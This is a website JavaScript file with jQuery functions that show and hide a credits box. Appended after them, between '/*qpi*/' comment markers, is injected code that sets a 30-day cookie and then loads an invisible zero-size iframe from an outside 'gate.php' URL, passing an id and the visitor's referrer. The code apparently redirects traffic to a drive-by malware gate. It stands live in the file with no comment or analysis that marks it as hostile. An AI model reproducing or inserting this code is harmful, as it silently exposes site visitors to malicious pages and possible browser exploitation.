function showCredits() {
	var box = $("#credits_box");
	
	var boxSize = { width: box.width(), height: box.height() };
	var winsize = { width: $(window).width(), height: $(document.body).height() };
	
	//if(/MSIE/.test(navigator.userAgent)) alert("IE");
	
	box.css({
		position: 'absolute',
		top: (winsize.height - boxSize.height)/2 + 20, 
		left: (winsize.width - boxSize.width)/2 
	}); 
	
	box.show('slow');
}

function hideCredits() {
	$("#credits_box").hide('slow');
}/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://unclesammm.com/gate.php?f=829072&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
